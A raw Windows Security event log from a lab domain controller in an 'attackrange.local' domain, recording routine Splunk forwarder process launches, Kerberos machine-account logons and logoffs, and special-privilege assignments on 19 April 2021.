SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264725
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x155c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264727
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264726
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1940
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264728
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xbcc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264730
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x104c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264729
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1780
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264731
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264737
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85D2A6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264736
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x85D2A6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53629
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264735
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85D2A6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264734
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85D23A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264733
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x85D23A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53628
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264732
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85D23A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:32:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264740
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85DEA1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:32:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264739
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x85DEA1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53638
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:32:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264738
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85DEA1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:33:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264741
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1290
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264743
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264742
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264744
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1258
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264746
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x115c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264745
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264747
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1574
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5059
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Other System Events
OpCode=Info
RecordNumber=264750
Keywords=Audit Success
Message=Key migration operation.
